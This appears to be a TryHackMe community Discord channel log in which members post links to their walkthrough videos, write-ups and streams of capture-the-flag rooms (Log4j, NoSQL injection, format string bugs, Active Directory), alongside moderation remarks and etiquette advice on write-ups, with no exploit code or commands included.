This video contains walkthrough of Day 7's task from Advent of Cyber 2021. We will work with MongoDB and do NoSQL injection attack on target website that operates on mongoDB. More will follow this videos as new tasks are released daily.
Link to tryhackme page - https://tryhackme.com/room/adventofc...
@strange pelican Is this tryhackme related?
No Sorry, hahaha my fail, is for other community
Starting a youtube to start doing walkthroughs etc, going to include write ups as well. Here is my first, youtube video is my first test 1. https://rubelefsky.medium.com/tryhackme-advent-of-cyber-3-walkthrough-day-1-idor-insecure-direct-object-references-54883eb74ee7
TryHackMe Advent of Cyber 3 - Day 4 Walkthrough
Fuzzing with Burpsuite. I highly recommend checking out the Burpsuite room on TryHackMe.
https://tryhackme.com/room/rpburpsuite
0:00 Intro
0:42 Question 1
0:55 Question 2
2:00 Question 3
4:03 Question 4
#exploiting#log4j#hacking
Olรก, nesse vรญdeo eu exploro a maquina Solar da TryhackMe, visando demonstrar a nova vulnerabilidade do Log4j
Github: https://github.com/BlackReaperSK
SpaceHacking: https://spacehacking.tech
TryHackMe: https://tryhackme.com/p/BlackReaper
Discord: BlackReaper ๆฐด#2377
TryHackMe Advent of Cyber 3 - Day 5 Walkthrough XSS
Cross site scripting attacks
This is the first walkthrough with an audio voiceover for my TryHackMe walkthroughs. There was a little problem with the microphone that I will get to the bottom of.
Learn cybersecurity with TryHackMe, HackThebox, Pentester Labs and much more. All coming to thi...
For Day 17's task if you want list of regions go here https://github.com/darkoid/Cloud-Hacking/blob/main/AoC3-Day17/regions.txt
I have also added the script to list all answers automatically but you will need to find the AWS Access Key ID and other stuff from file
#Analysis #AoC3 #2021
This video contains walkthrough of Day 19's task from Advent of Cyber 2021. We will learn to analyse a suspicious file send by one of the elves. More will follow this videos as new tasks are released daily.
Link to tryhackme page - https://tryhackme.com/room/adventofcyber3
Aren't auto scripts considered cheating?
Writing buffer overflows in Rust today
https://twitch.tv/mrglitchbyte
Rust || Buffer Overflows today || OSCP Prep, Day 7 || Linux || Neovim || !discord
#Transcription #AoC3 #2021
This video contains walkthrough of Day 23's task from Advent of Cyber 2021. We will learn to audit transcription log files to recover a permanently deleted file. More will follow this videos as new tasks are released daily.
Link to tryhackme page - https://tryhackme.com/room/adventofcyber3
AoC2? I've been here since Hackback2!
I guess we're not the same?
@heavy kindle This channel is for THM content like YouTube videos of THM rooms, or writeups.
oh sry
where do i put it then though
Looks really nice and professional.
What's that autocomplete action going on in your video?
I wanted this video to be clear, I re-recorded everytime I made a syntax error. Target of this video is people who currently dealing with #878393611929129000
I didn't realize kali had autocomplete though on your command line, that's cool
Yep, it is.
Learning more about buffer overflows today!
What music are you playing on your VOD that you don't get a copyright strike?
4K ๐ด Lofi Hip Hop Beats 24/7 Radio ๐ด No Copyright Lofi Beats to sleep/ study to
Instructions about using the lo-fi songs, below in the description.
Follow my Spotify Lo-Fi Playlist: https://spoti.fi/3dTH2FN
Commands for the chat:
!menu ( to see the full bar's menu )
!rain
!joke
!love
!time
!winner
Welcome to the Lo-Fi Cafe. The perfect place t...
There are a couple others I use
Enjoy this cozy fall coffee shop ambience with relaxing jazz music and rain sounds for studying, relaxation, and sleep. It's a rainy autumn night. Watch falling leaves and listen to the soothing sounds of heavy rain, smooth jazz, and ambient coffee shop noise including soft conversation and gentle clinks of dishes. This dimly lit late night cafe...
And any of the Streambeats by Harris Heller
I currently have music during live streams, but the stream is separate so it doesn't get me schwacked in the vod
Glad to see in not the only one who has issues just getting started while I'm trying to stream. I gave ya a follow
Yeah thats always tricky, finding music that doesnt schwack you later. Youre definitely not the only one, I couldnt get RDP working for the life of me 
Also followed you!
Its Wednesday Hackday. We're just going to hack something today.
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
Falling down the rabbit hole and entering wonderland today.
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
God, I love the art sometimes. Most times, actually!
wait what is this
can you give me the room link?
osi room
Two things:
A) Answer dumps are not writeups. Indeed, there's an explicit instruction when you submit writeups to THM rooms that they should not contain answers. Besides that, it doesn't do you any favours to simply reveal answers. If you want your writeups to be respected + beneficial to you (and the community at large) they need to explain how you reached an answer, without revealing the answer itself.
B) Have you had those accepted on the rooms before posting them here? I would suspect not (for the above reason). As a heads up, if the writeups have not been accepted to the room, we don't give them an audience in here (especially if it's for community submitted rooms, out of respect for the creator -- although that doesn't apply here).
As a side note as well: writeups for walkthroughs are generally not a good idea. They tend to either be answer dumps (which are objectively bad), or the writeup author attempting to explain the content of the room themselves.
That latter one is fine to host on your own platform, but attempting to attach it to the room is... insulting, to say the least, because it tells the creator that you think they've done an inadequate job, thus necessitating your own explanation.
It be that way sometimes
I'm genuinely surprised more people don't share their journey, but maybe I'm weird
well, I've done plenty of ctfs but it's because of one critical reason(imshy) 
Fair enough 
I like having study buddies and like to see how other people make it through it all
I've posted a short explainer of the log4j vuln - https://youtu.be/wyp2tCBY8jw
A walkthrough of the Solar room is coming soon!
In this video, I give an overview of what Log4Shell is and why its impact is so significant. Look out for Episode 2 of the series, where I show you TryHackMe's Solar room!
---LINKS---
John Hammond's video: https://www.youtube.com/watch?v=7qoPDq41xhQ
TryHackMe's Solar room: https://tryhackme.com/room/solar
SANS Holiday Hack Challenge 2021: https:...
seems good.
Thanks! Trying to churn out some more content before I get back into studying in the next couple of daysโฆ
Gave +1 Rep to @tropic dust
Do you have examples of what a write-up should be?
There are a few ways of going about it. The easiest is a walkthrough of the room explaining what you did and why. You can improve that by showing what didn't work and perhaps why it didn't work.
You could also write a full pentest report style format, if it's appropriate (boot2root etc)
Not off the top off the top of my head (well, none that I didn't write).
As James said, it should basically be an explanation of your thought process when working on a challenge. What worked, what didn't work, why did you try what you did?
You explain how you reached the answers, without actually revealing the answers.
Ill give both your suggestions a try, I haven't submitted a write-up for a box yet but Id def like to!
Thanks! @tropic lava @formal sparrow
Gave +1 Rep to @tropic lava
Hacking through THM's Wonderland, a rabbit's descent!
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
Finally finished the write-up for Wonderland!
https://www.glitchbyte.io/wonderland-thm-write-up/
Bounty Hacker CTF (/cowboyhacker) write up: https://exploit.quest/tryhackme-bounty-hacker-ctf
TryHackMeโs Bounty Hacker CTF room is targeted towards beginners and entails the basics of network enumeration, FTP, SSH, brute-force attacks, and privilege escalation.
RootMe CTF (/rrootme) write up: https://exploit.quest/tryhackme-rootme-ctf
TryHackMeโs RootMe CTF room is targeted towards beginners and entails the basics of network enumeration, web server enumeration, reverse shells, and privilege escalation.
Nice writeup!
||You could have placed your fake random in the current working directory though||
Thanks!
I eventually did as I was going back through everything 
I loved this room, wish people would make more series, anime, novel based ctfs/rooms
You have to worry about copyright and licensing.
Ah the licensing bullshit, forgot about that, It was a pain finding a picture on the internet and seeing if it was publicly available whenever you wanted to make a simple video i.e
First Monday of the year started off right, with THM!
https://twitch.tv/mrglitchbyte
Can Pickle Rick be saved? Find out on the next episode of TryHackMeZ!
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
Wonderland Part 2: Into the Looking Glass. What will we learn today?
https://twitch.tv/mrglitchbyte
OSCP Prep Day 15: Into the Looking Glass!
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
OSCP Prep Day 16: Time to break the glass!
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
OSCP Prep Day 17: Finishing and going over the Wonderland series on THM today.
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
OSCP Day 18, Intro to PoC scripting and Rust!
https://twitch.tv/mrglitchbyte
Lets learn some Rust today || OSCP Prep, Day 18 || Linux || Rust || TryHackMe || !discord
OSCP Day 19, Proof of Concept Scripting.
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
OSCP Prep Day 20, starting on the PATH.
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
OSCP Prep Day 21, hack and slash through EternalBlue.
https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
Another study session. Checked out the Welcome, RootMe, BountyHacker, and Skynet rooms https://www.twitch.tv/videos/1267310956
ancientreddragon went live on Twitch. Catch up on their Science & Technology VOD now.
A full-length walkthrough of me completing the Solar room (approved and on the room walkthroughs list): https://youtu.be/25IvtwEwyp4
In this video, I complete TryHackMe's log4j room, Solar! Sorry for the length... I tried to trim it down! Check the timestamps if you need a specific part.
---LINKS---
Check out the Solar room - https://tryhackme.com/room/solar
Watch my video about the log4j vulnerability - https://www.youtube.com/watch?v=wyp2tCBY8jw
Check out John Hammond's You...
There are timestamps in the description for each section of the room.
nice work (: ๐
hi guys
I like how nicely you labeled your timestamps
Report spam
thanks @waxen grove it's been dealt with (:
Gave +1 Rep to @waxen grove
tomghost - TryHackMe - Starters Series
https://twitch.tv/ancientreddragon
@manic snow I made this for you, I hope you enjoy it
hahahahaha
you can call me haz btw (long story, hxz sounds more like hacks but is actually meant to be haz but i cba changing at this point)
that "zee" reminded me you were american
i normally hear "h x zed"
Huh, I've been pronouncing it hiz
xz both being pronounced with z
Yeah people pronounce my username 'ay-tee-eightch' instead of just saying ATHLETE. I thought people could recognize the L337 "hacker-speak" but i guess not
๐ i've always pronounced it as athlete but never noticed the "leet"/1337
I wanted to create a box around the two 3s, in d&d ATH is short for Athletics, a proficiency you're often asked to roll during a game
@sullen charm
now we can finally communicate without a language barrier
trust me you don't wanna see the code for that ๐
i got lazy
".shift()" twice ๐, probably should have made the test.split into a variable too
you wanna see lazy?
๐
aaaaa i didnt notice till now
I love it though, our respective countries should give us ambassadorships
i agree
After a much needed break, we're hitting the ground running! https://twitch.tv/mrglitchbyte
Fail hard, fail fast, fail often. I do that quite a bit, but we'll have fun along the way! Currently working towards the Offensive Security Certified Professional (OSCP) certification.
Res - TryHackMe - Starters Series
https://twitch.tv/ancientreddragon
Lumberjack Turtle - TryHackMe - Official Walkthrough
This is the official walkthrough for my Lumberjack Turtle challenge room that TryHackMe published last week at https://tryhackme.com/room/lumberjackturtle
Hack hard!
#redteam #tryhackme
Want to get exclusive tips, tricks and killer command line cheats to hack your apps and infrastructure? Join my inner circle at https://learn.vulscan.com/...
Hi everyone, I am Anirudh, in this Live stream I will be streaming, me doing the Ignite room on TryHackMe.
Streaming the Ignite room on THM ๐
@sacred ferry Advertising other servers is strictly prohibited
Okay im sorry.
I did some reading in Red Team Recon and got to play with DNS, built-in tools, and advanced searching (google-dorking). I'm going to try to do every Monday as a "Cyber Monday" study session. Gotta schedule time for things if we want to level up, right?
https://www.twitch.tv/videos/1282892512
ancientreddragon went live on Twitch. Catch up on their Science & Technology VOD now.
Cybersecurity, hacking, certifications, mentoring, programming, red teaming, etc. All these things require you to be constantly learning, but how does one do that effectively? This channel is dedicated to an 'organic' learning style where I will be experimenting with and learning interesting things related to cybersecurity. My hope is that by sh...
https://www.danaepp.com/post/how-to-approach-reverse-engineering-elf-x64-buffer-overflows-these-days
So this weekend TryHackMe released a new challenge room called DearQA. It's marked as an Easy room, and it didn't take much time at all for me to complete. However, I've seen a bunch of posts on the forum and on Discord of people struggling. That surprised me, and got me thinking... The Internet is a treasure trove of information when it comes t...
Great article, I had the same problem using python3 but I saw that A*39 also worked but your sys.stdout.buffer.write() makes more sense, thanks
Gave +1 Rep to @stable nest
Blaster done, got through it despite the known room bug by using a bit of critical thinking https://www.twitch.tv/videos/1290781932
0xathl337 went live on Twitch. Catch up on their Science & Technology VOD now.
Walkthrough of DearQA (PWN) with no flag reveal https://www.youtube.com/watch?v=XIBwx2ZEuwI
Detailed walkthrough of DearQA TryHackMe room. Step by step analyzing the binary and understanding how and why the exploit works.
00:00 Intro
01:10 Intro to the room
01:25 Analyzing the binary
04:35 Executing the binary
05:02 Testing for Format String
05:12 Testing for Buffer Overflow
06:15 Checking binary's protections
08:00 Reverse Engineerin...
Completed Phishing Emails 1 on this glorious "Friday Night Phishing" https://www.twitch.tv/videos/1295144662
0xathl337 went live on Twitch. Catch up on their Science & Technology VOD now.
Hey everyone! New walkthrough of Bounty Hacker! 
ps: the user.txt and root.txt are blurred... so no copy pasta here ๐
Summary:
Feel free to reach out if you think I can help in any way ๐ค
Discord Community: https://discord.gg/QJ7vErwr2y
Twitter: https://twitter.com/DavidAlvesWeb
Also, show some love to the creator of this great THM room ๐ฅฐ
Twitter: https://twitter.com/sevuhl
Blog: https://sevuhl.wordpress.com/
0:00 - Intro
0:43 - Nmap scan
3:06 - Web App
3:42 ...
For anyone who uses pwncat that wants to automatically exploit pwnkit, I've written a module you can use. You can grab it on Github at https://github.com/DanaEpp/pwncat_pwnkit . You can also see it in action at https://asciinema.org/a/n3DRuvT0hr8yslrXX7RsGG1LW
Silver you are just a legend! Thanks!
Gave +1 Rep to @stable nest
I might change it a bit and make it fully self contained, lots of machines donโt have gcc installed so I think it would be a cool feature,
My code already does that
Part of the pwncat framework
If gcc isnโt on the remote target it compiles it on your machine and then uploads it
Oh cool than I have no improvements haha
You must set the โcrossโ variable in pwncatrc so it knows which gcc to use locally
It will even compile to an arm target
It checks the remote arch and sets the -march flag in gcc
OH MY GOD!!
it's amazing!!
Is this TryHackMe content?
community media ๐
media of the community ? idk sory sory ma bad
As the channel description, it's intended for THM content eg writeups
if I record a public tryhackme room and upload on youtube is fine or?
Unless the room says not to, it's fine
Lumberjack Turtle is a medium difficulty box from Tryhackme which is entirely focused on Log4j/Log4shell a 0-day vulnerability that caused a havoc on the internet . The website is vulnerable to Log4j & so weโre able to exploit it and get a shell on the box . We find a .dockerenv file in the / directory which indicates we are on a docker containe...
you will be good. I actually just got a notification on reddit, they are looking for streamers that record rooms.
๐ Well, I still didn't start with recording rooms. Planning to do tho.
I would have to do a run through with the rooms, first. I still feel like it takes me forever to get through one.
well
I am recording rooms, in fact
(If this is considered spam I apologize beforehand)
Is this tryhackme content?
What is considered tryhackme content? Videos referring exclusively to THM rooms?
Yeah, video walkthroughs of THM etc.
In that case no, in this particular video I didn't refer to any specific room.
Okay, please keep this channel just for THM content, as the channel topic says.
Sure thing ๐ it is support material for several rooms, but not room-specific
My first video "writeup" premieres in ~20 minutes! - https://www.youtube.com/watch?v=XCksAoCN7qU
Join me for some ethical hacking as we try to gain access to the TryHackMe box "Flatline" using Kali Linux! This box gave me a headache, but did I manage to own it in the end?!
Social:
Discord: https://discord.gg/MVsKQnXrC5
Twitter: https://twitter.com/hagslab
Instagram: https://www.instagram.com/hagslab/
GitHub: https://github.com/hagronnestad...
That's cool :)
Great video.
Thank you, I appreciate it! ๐
Gave +1 Rep to @lime crow
Napping is a medium difficulty box from TryHackMe which had a interesting vulnerability called Tab Nabbing to phish the admin of the website to get user danielโs credentials by which we could ssh into the box. We then alter a python file which is run every minute by user adrian to get a reverse shell back as that user. For root, we could execute...
My writeup video
https://youtu.be/n6yr_O3xdVg
#a #supra #tryhackme #rootme #writeup #hack #hacker #cybersecurity
My another writeup video (including supra)
https://youtu.be/mkxSO8irxbU
#tryhackme #hack # hacker #writeup #cybersecurity
what is the name of the extension with usefull command ?
I found !
I made a comprehensive walkthrough for the Simple CTF challege with a python script for hash cracking. You can find it here https://medium.com/@n3phel1m/simple-ctf-tryhackme-ctf-walkthrough-451cb6361405
would somebody like to create a nice icon for my upcoming Layer 2 (MAC Flooding and ARP Poisoning) room? ๐ my self-made icon is somewhat lame ๐
thx but it's really just a random pixabay pic and two filters/overlays ^^
Gave +1 Rep to @ripe badge
Iโd say, remove the fire, and add more โfuturisticโ type stuff
adds a old lightbulb
ok, I can try. what about a tsunami (for the mac FLOODING) ? jk
or what do you think about a depiction like this, for the MITM?
I believe the WebOSINT room needs to be updated
the answers don't work, new number new nameserver etc
you are about the 15th person shadow has seen mention that problem in different channels
Not at all :)
You are under no obligation to know, although typing keywords from the problem into the search bar can do wonders too ๐
My first writeup ๐
Going live to chill and solve some boxes. Come hang! https://www.twitch.tv/offftherecord
I'm a security engineer and I enjoy doing offensive security research, CTFs, and gaming. I hope we can learn together and from each other. But most of all have fun! If you like what you see, please give me a follow!
Back at it again tonight! ^
I just uploaded a tutorial for pwn106 from PWN101 room. A thorough step-by-step guide to understand the format string vulnerability. How do format string vulnerabilities happen, why and how can we abuse them. https://www.youtube.com/watch?v=0-ulL3Y0MS8
Understanding the format string vulnerability step by step in this thorough tutorial explaining its very foundations, the underlying concepts. How do format string vulnerabilities happen, why and how can we abuse them. Format String vulnerabilities allow an attacker to both leak memory and corrupt it by writing arbitrary values. In this video we...
Is it ok to use screenshots of premium rooms in a writeup? Of the challenges and their solutions ofcourse not the theory concepts
Should be fine, no idea why no one replied to you till now
I just published the tutorial for pwn107 from PWN101 room. An in-depth explanation about bypassing stack canaries and PIE/PIC by abusing a Format String vulnerability. We will understand what a canary is, what is its main purpose and how can we bypass it in order to hijack the program's execution flow. At the same time, we will dig into Position Independent Executable (PIE) or Position Independent Code (PIC) and learn how to bypass it as well, exploiting the same Format String vulnerability. Leaking addresses from the binary will allow us to get the dynamic binary's base address (its base address during execution) to finally perform a ret2win attack https://www.youtube.com/watch?v=FpKL2cAlJbM
Bypassing stack canaries and PIE/PIC by abusing a Format String vulnerability. In this step-by-step tutorial we will understand what a canary is, what is its main purpose and how can we bypass it in order to hijack the program's execution flow. At the same time, we will dig into Position Independent Executable (PIE) or Position Independent Code ...
Hi everyone! I stream TryHackMe most nights on Twitch. I'll be spending the next hour and a half (until midnight central time) working through the Throwback Network and working on Active Directory hacking. Would love to have some of you join me. I am live right now... see you soon!
https://twitch.tv/tyler_ramsbey
I regularly stream hands-on hacking videos - primarily through TryHackMe, HackTheBox, and VulnHub. If you're interested in Cybersecurity (or simply want to watch some real hacking) come join me for some late night hacking most nights!
Hey I am making a research paper on RDP if anyone is willing to give me criticism I would greatly appreciate it!
@midnight socket this channel is for media of tryhackme content
oh my b
I just published the tutorial for pwn108 (from the room PWN101). In this video we will see step by step how to overwrite GOT (Global Offset Table) entries by abusing a Format String vulnerability, hence hijacking the execution flow of the program. We will see in detail how to overwrite memory with the %n format specifier from the printf family of functions, understanding how to write 4 or less bytes with the values we desire at the address we want. Besides, bad chars of printf function will be also discussed, which define how the payload must be arranged. https://www.youtube.com/watch?v=9SWYvhY5dYw
In this video we will see step by step how to overwrite GOT (Global Offset Table) entries by abusing a Format String vulnerability, hence hijacking the execution flow of the program. We will see in detail how to overwrite memory with the %n format specifier from the printf family of functions, understanding how to write 4 or less bytes with the ...
Hi everyone. I have a YouTube channel where I post a lot of content and writeups of TryHackMe rooms, but I also have other security related content. Feel free to take a peak and if you like it let me know ๐
Here is just one video as an example of the room Mr. Phisher
https://youtu.be/IkzvybP046Q
TryHackMe! Mr. Phisher
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
Check out my newest video:
TryHackMe! Tech_Supp0rt: 1 - Typical Tech Support Scam , Lets take a look at this room on TryHackMe. Its going to be a long video.
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
omg, remade the video but OBS crashed, causing audio sync issues and leaving off the final batch of answers. Today's not my day https://youtu.be/VCkRRyU_0-0
Agent Sudo - I have just completed this room! Check it out: https://tryhackme.com/room/agentsudoctf #tryhackme #enumerate #exploit #brute-force #hash cracking #agentsudoctf
Latests video about a room that bugged me out a lot. Its a crazy room I will say that. The video got rather long, but I decided to keep it. It shows some struggle, frustration and the person behind it. I hope you like it.
https://www.youtube.com/watch?v=uHg-7Mo7Vio&ab_channel=Securityinmind
This room was rather tricky and really odd at times. In the video you will see me struggle going through my own notes, and just getting to root is going to be even worse. But I will do it all and if you watch the whole video you will learn a lot of different things :)
TryHackMe! Sea Surfer - Not really Medium Difficulty More Like Hard - Long V...
Gave +1 Rep to @half epoch
Thanks ๐ you made a fun box ๐ฆ
Gave +1 Rep to @ripe badge
Check out my newest video on a old room.
https://youtu.be/eytRMU-Scns
Enjoy ๐
Broken Authentication is a really bad thing but it happens a lot. I have seen it myself many times that students create some new mechanism and from the eye it looks ok and secure, but it is not.
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
I just did Overpass too! https://systemweakness.com/dthm-overpass-i-de0f1fdf2e2d
Overpass 2 Hacked - the second video on the series:
Its a revisit to the room called Overpass. This room require a bit of analysis before we can hack our way back in and find the user and the room flag.
TryHackMe! Overpass 2 Hacked - Broken Authentication - Traffic Analysis
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://st...
Decided to record a morning video. I hope you like it ๐
Yet another network traffic analysis video. Check it out :)
TryHackMe! h4cked - Traffic Analysis
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
Hey all -- I did video walkthroughs & explanations on every threat/room in the "Recent Threats" module. If you get stuck or would like some extra learning, I hope you find these helpful
CVE-2022-26923: https://www.youtube.com/watch?v=a-bCbIqGMCg
Spring4Shell: https://www.youtube.com/watch?v=iWdO9C5Aw_g
Log4J: https://www.youtube.com/watch?v=QDNPsupvAME&t
Dirty Pipe: https://www.youtube.com/watch?v=VfBTEpk2oz0&t
Pwnkit: https://www.youtube.com/watch?v=w5nBnvmYlf8&t
Print Nightmare: https://www.youtube.com/watch?v=FGivGdziLuA
Check out my new video of the room called Annie. ๐ Hope that you like it ๐
https://www.youtube.com/watch?v=0q0FH1p9BfM&ab_channel=Securityinmind
Today weยดre looking at the room called Annie on TryHackMe. The room is anounced to be a medium difficult room, but it really felt like an easy room. Check it out and see if you agree :)
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
content machine ๐ช
I have 58 videos on my YouTube channel about TryHackMe rooms. Im a fan ๐
Take a look, its a playlist. ๐
https://www.youtube.com/playlist?list=PLUhliCA9c5DHw0PH-EaPcIY-6q5shJ7pV
YAY thanks so much horror.... going to watch that later today
Gave +1 Rep to @half epoch
Hope you like it ๐
Another video that I just recorded, please let me know if you liked it ๐
https://www.youtube.com/watch?v=OhIP0C9hxZQ&ab_channel=Securityinmind
In this room on TryHackMe weยดre going to check out the CVE-2022-26134 called Atlassian. The room is fun and really easy, and that is the dangers of exploits. They can be really easy and even a zero-day exploit just about 1 month ago.
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: ...
I had some extra time on my hands and I was browsing rooms about git. Found one ๐
This video I will be going through the room called Git Happens and talk about the implications there are when sensitive information is forgotten in a repository.
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
@graceful coral This channel is for tryhackme content
Old room but new video. I felt like a piece of chocolate. Check it out ๐
https://www.youtube.com/watch?v=yMftk9uJC90&ab_channel=Securityinmind
I like chokolate and TryHackMe. In this video weยดre going to check out the room called Chocolate Factory. Is it all about Chocolate or is there a Factory, check it out to find out :)
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
Another old room but never too old. It will never grow old:
In this video weยดre going to take a look at different ways to enumerate dubdomails.
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
Year of the jellyfish writeup using Pwnkit exploit for LPE.
https://blog.utkar5hm.tk/posts/yotj/
I've been writing write-ups for a while now. haven't posted anything here before, So you can checkout my other posts too.
Another git room with bad git history. Check it out ๐
https://youtu.be/ZxDUpwWyrbk
Just another example of a bad commit history. Check it out :)
Like my videos? Would you consider to donate to me I created a possible way for you to do that.
Donation link: https://streamlabs.com/securityinmind/tip
Hey there, it's great that you post all these videos about rooms.
If you could just wait 72 hours after the release of a new room before posting a walkthrough about it would be much appreciated.
It's fine for now, but just so you know ๐
Sure. How do I see how many hours old a room is?
It tells that the room "committed is 121 days old". I guess thats not true then ๐
I guess the best would be to just go by the date when a room is released in #announcements
As mentioned, use the time since it was publicly announced as your guide here
We just agreed on day 4. Thats safe.
Fontaene and i.
๐
Sounds good
Here is a 3 part series where I work through the Exploiting AD room. Enjoy!
Exploiting AD (Part 1) -- https://youtu.be/KfbxgD9XK30
Exploiting AD (Part 2) -- https://youtu.be/ezdDMkMyHVM
Exploiting AD (Part 3) -- https://youtu.be/5tVDVptZH_w

